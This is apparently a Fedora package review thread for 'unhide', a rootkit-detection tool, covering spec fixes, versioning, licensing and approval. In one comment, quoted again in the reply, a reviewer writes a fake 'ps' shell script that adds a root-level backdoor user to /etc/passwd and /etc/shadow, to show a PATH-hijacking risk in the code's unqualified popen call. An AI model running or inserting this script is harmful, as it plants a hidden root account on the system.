You probably only need on of these two lines, because the second one will overwrite the output of the first one:

%{__cc} %{optflags} unhide.c -o unhide
%{__cc} %{optflags} unhide-linux26.c -o unhide

Also you do not follow 
https://fedoraproject.org/wiki/Packaging/Guidelines#macros
Use either $RPM_OPT_FLAGS and $RPM_BUILD_ROOT or %optflags and %buildroot.

http://koji.fedoraproject.org/koji/taskinfo?taskID=921140

http://rakesh.fedorapeople.org/srpm/unhide-20080519-2.fc10.src.rpm
http://rakesh.fedorapeople.org/spec/unhide.spec

Updated - Thanks

I've just taken a look at the project page and as far as I see, upstream is a bit inconsistent with the name of the source. First version was "unhide.tgz", followed by "unhide02112007.tgz" while the current version seems to be "unhide20080519.tgz" (note the change from day-month-year to year-month-date). I suggest to follow http://fedoraproject.org/wiki/Packaging/NamingGuidelines#Snapshot_packages in naming your package (i.e. change
  Version:        20080519
  Release:        2%{?dist}
to 
  Version:        1.0
  Release:        2%{?dist}.20080519
thus avoiding problems in the future.

http://rakesh.fedorapeople.org/spec/unhide.spec
http://rakesh.fedorapeople.org/srpm/unhide-1.0-1.fc10.20080519.src.rpm

looking at the code, I see that unhide.c does:
    #define COMMAND "ps -eLf | awk '{ print $2 }' | grep -v PID"
followed by  
    fich_tmp=popen (COMMAND, "r") ;


Now, my C is quite rusty, but 
- AFAIR, you must be root to see some of the info this program requires
- anything named "ps" and found in root's PATH will be launched by the above code

To be honest, I would not run this "security application" on my system. I am afraid of something along 
cat >> /usr/local/bin/ps << EOF
#! /bin/bash
echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >> /etc/shadow
/bin/ps $*
EOF

(In reply to comment #5)

> To be honest, I would not run this "security application" on my system. I am
> afraid of something along 
> cat >> /usr/local/bin/ps << EOF
> #! /bin/bash
> echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
> echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >>
> /etc/shadow
> /bin/ps $*
> EOF

/usr/local/bin is only writable by root and how does not packaging unhide prevent you from this attack? Or do you never use ps without an absolute path as root? Nevertheless, the attacker could also do this for any binary on the system, not only ps.

Package Review
==============

Key:
 - = N/A
 x = Check
 ! = Problem
 ? = Not evaluated

=== REQUIRED ITEMS ===
 [x] Package is named according to the Package Naming Guidelines.
 [x] Spec file name must match the base package %{name}, in the format %{name}.spec.
 [x] Package meets the Packaging Guidelines.
 [x] Package successfully compiles and builds into binary rpms on at least one supported architecture.
     Tested on: devel/x86_64
 [x] Rpmlint output:
source rpm: empty
binary rpm:
unhide.x86_64: W: incoherent-version-in-changelog 1.0-1 ['1.0-1.fc11.20080519', '1.0-1.20080519']
=> benign, but a fix would be nice
 [x] Package is not relocatable.
 [x] Buildroot is correct (%{_tmppath}/%{name}-%{version}-%{release}-root-%(%{__id_u} -n))
 [x] Package is licensed with an open-source compatible license and meets other legal requirements as defined in the legal section of Packaging Guidelines.
 [x] License field in the package spec file matches the actual license.
     License type as specified by source: GPLv3+
 [x] If (and only if) the source package includes the text of the license(s) in its own file, then that file, containing the text of the license(s) for the package is included in %doc.
 [x] Spec file is legible and written in American English.
 [x] Sources used to build the package match the upstream source, as provided in the spec URL.
     SHA1SUM of package: 93f9c11de8beef78790ecaf1423dbcdf22532e53  /tmp/unhide20080519.tgz
 [x] Package is not known to require ExcludeArch
 [x] All build dependencies are listed in BuildRequires, except for any that are listed in the exceptions section of Packaging Guidelines.
 [-] The spec file handles locales properly.
 [-] ldconfig called in %post and %postun if required.
 [x] Package must own all directories that it creates.
 [-] Package requires other packages for directories it uses.
 [x] Package does not contain duplicates in %files.
 [x] Permissions on files are set properly.
 [x] Package has a %clean section, which contains rm -rf %{buildroot}.
 [x] Package consistently uses macros.
 [x] Package contains code, or permissable content.
 [-] Large documentation files are in a -doc subpackage, if required.
 [x] Package uses nothing in %doc for runtime.
 [-] Header files in -devel subpackage, if present.
 [-] Static libraries in -devel subpackage, if present.
 [-] Package requires pkgconfig, if .pc files are present.
 [-] Development .so files in -devel subpackage, if present.
 [-] Fully versioned dependency in subpackages, if present.
 [x] Package does not contain any libtool archives (.la).
 [-] Package contains a properly installed %{name}.desktop file if it is a GUI application.
 [x] Package does not own files or directories owned by other packages.
 [x] Final provides and requires are sane.

=== SUGGESTED ITEMS ===
 [x] Latest version is packaged.
 [x] Package does not include license text files separate from upstream.
 [-] Description and summary sections in the package spec file contains translations for supported Non-English langua
ges, if available.
 [x] Reviewer should test that the package builds in mock.
     Tested on: devel/x86_64, F7/x86_64
 [?] Package should compile and build into binary rpms on all supported architectures.
 [x] Package functions as described.
 [-] Scriptlets must be sane, if used.
 [-] The placement of pkgconfig(.pc) files is correct.
 [-] File based requires are sane.
 [-] %check is present and the test passes.


===Notes ===
1. Author's intent seems to be GPLv3+, but the sources do not include the bits required to specify this. I recommend getting in touch with the author and asking him to include the license in the source files, not only in the bundled readme files (spanish/eng)

Package APPROVED.

Thanks
Ok - I will communicate this to upstream.

New Package CVS Request
=======================
Package Name: unhide
Short Description: Tool to find hidden processes and TCP/UDP ports from rootkits
Owners: rakesh
Branches: F-8 F-9 F-10
InitialCC:
Cvsextras Commits: yes

Humm... the README.txt contains: 

"
// License

GPL V.3 (http://www.gnu.org/licenses/gpl-3.0.html)"

Which sure sounds like the license tag should be GPLv3 here, not GPLv3+
In any case it might be good to clarify that before importing and building? 

cvs done, but please clarify before importing. (F-8 branches are no longer accepted, so this was left out).

Yes, I have already dropped a mail. Which check before importing or building.

No reply regarding license. I have resend the message. Probably maintainer is on holidays. Lets wait for few more days.

It is GPLv3 only.
Got a reply today from author. I will import now. I have requested for inclusion of license in source files also.

Thanks.

unhide-1.0-2.fc10.20080519 has been submitted as an update for Fedora 10.
http://admin.fedoraproject.org/updates/unhide-1.0-2.fc10.20080519

unhide-1.0-2.fc9.20080519 has been submitted as an update for Fedora 9.
http://admin.fedoraproject.org/updates/unhide-1.0-2.fc9.20080519

Package Change Request
======================
Package Name: unhide
New Branches: el6
Owners: cicku

Git done (by process-git-requests).

unhide-20130526-1.el6 has been submitted as an update for Fedora EPEL 6.
https://admin.fedoraproject.org/updates/unhide-20130526-1.el6

unhide-20130526-1.el6 has been pushed to the Fedora EPEL 6 stable repository.